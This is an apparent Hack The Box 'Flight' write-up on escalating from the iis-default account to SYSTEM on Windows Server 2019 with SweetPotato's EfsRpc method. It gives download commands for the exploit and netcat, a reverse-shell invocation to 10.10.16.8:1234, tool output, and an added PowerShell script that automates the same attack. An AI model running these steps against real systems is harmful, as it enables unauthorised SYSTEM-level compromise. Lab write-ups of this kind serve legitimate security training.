SweetPotato


The compromised iis-default account holds both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege. Either one is enough to impersonate a SYSTEM token obtained by coercing a privileged authentication to a listener the low-privileged process controls, which makes the target vulnerable to the potato family of exploits.

I would usually use JuicyPotato for token impersonation, but it does not work on Windows 10 1809 / Windows Server 2019 or later, where Microsoft fixed the DCOM activation trick it relies on. The target system is Windows Server 2019, so I will be using an alternative: SweetPotato.

SweetPotato is a collection of native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @_EthicalChaos_ and includes:

  •     RottenPotato
  •     Weaponized JuicyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam

Exploit


Exploit binary is available online

Exploitation


PS C:\tmp> iwr -Uri http://10.10.16.8/potato/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
PS C:\tmp> iwr -Uri http://10.10.16.8/potato/nc64.exe -Outfile C:\tmp\nc64.exe

Delivery complete. Netcat will be the payload that SweetPotato launches under the impersonated SYSTEM token, giving a reverse shell back to the attacking host.

PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\tmp\nc64.exe" -e EfsRpc -a "10.10.16.8 1234 -e powershell"
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch c:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/a733b8d5-3080-4df9-9cbb-4d96c472d501/\a733b8d5-3080-4df9-9cbb-4d96c472d501\a733b8d5-3080-4df9-9cbb-4d96c472d501
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EfsRpc method (built on EfsPotato/PetitPotam). SweetPotato creates a named pipe it controls and calls the MS-EFSR EfsRpcOpenFileRaw function with a UNC path pointing at that pipe, which makes the local system authenticate to it as SYSTEM. Because iis-default holds SeImpersonatePrivilege, SweetPotato can impersonate that connection, duplicate the SYSTEM token and create the payload process (nc64.exe) with it.
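As an added example (not part of the original writeup or of the SweetPotato project), the pre-flight checks a practitioner would run on the target before spending time on a potato, followed by the same SweetPotato/nc64 invocation used above. The binary paths, listener address and port are the ones from this box; the build-number threshold for JuicyPotato (17763 = Windows 10 1809 / Server 2019) and the idea of gating on `whoami /priv` are my assumptions, not anything the tool itself does.

```powershell
# Added example, not from the original writeup. Assumed paths and listener from this box.
$SweetPotato = 'C:\tmp\SweetPotato.exe'   # assumed: where the binary was dropped
$Nc64        = 'C:\tmp\nc64.exe'          # assumed: payload to launch as SYSTEM
$Listener    = '10.10.16.8'               # attacker host from the writeup
$Port        = 1234                       # attacker listener port from the writeup

# 1. Does the current token hold a privilege the potato family needs?
#    'whoami /priv' prints one line per privilege; a 'Disabled' state is fine,
#    the exploit enables the privilege itself before impersonating.
$privs          = (whoami /priv) | Out-String
$hasImpersonate = $privs -match 'SeImpersonatePrivilege'
$hasAssignToken = $privs -match 'SeAssignPrimaryTokenPrivilege'
if (-not ($hasImpersonate -or $hasAssignToken)) {
    Write-Warning 'No SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege: potato exploits will not work from this account.'
    return
}
Write-Host "[*] SeImpersonatePrivilege=$hasImpersonate SeAssignPrimaryTokenPrivilege=$hasAssignToken"

# 2. Which potato is viable? JuicyPotato's DCOM trick was fixed in
#    Windows 10 1809 / Server 2019 (build 17763), so on that build or newer
#    use a named-pipe based method such as SweetPotato's EfsRpc mode.
$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
if ($build -ge 17763) {
    Write-Host "[*] Build $build: JuicyPotato is not an option, using SweetPotato EfsRpc"
} else {
    Write-Host "[*] Build $build: JuicyPotato would also work, still using SweetPotato EfsRpc"
}

# 3. Make sure both binaries actually landed before triggering the coercion.
foreach ($bin in @($SweetPotato, $Nc64)) {
    if (-not (Test-Path -LiteralPath $bin)) {
        Write-Warning "Missing $bin; run the iwr downloads first."
        return
    }
}

# 4. Same invocation as in the writeup: SweetPotato coerces a SYSTEM
#    authentication via EfsRpcOpenFileRaw, impersonates it and launches nc64
#    with the given arguments (reverse shell to the listener, spawning powershell).
#    Start the listener on the attacking host first, e.g. `nc -nlvp 1234`.
$ncArgs = "$Listener $Port -e powershell"
& cmd /c $SweetPotato -p $Nc64 -e EfsRpc -a $ncArgs
```

Run it from the same PowerShell session the downloads were done in. If step 1 fails the remaining work is wasted, and if step 4 returns without "Process created" the coercion did not reach the pipe; the listener side should then show no connection.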

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 1234         
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54213
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
g0
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2 

System Level Compromise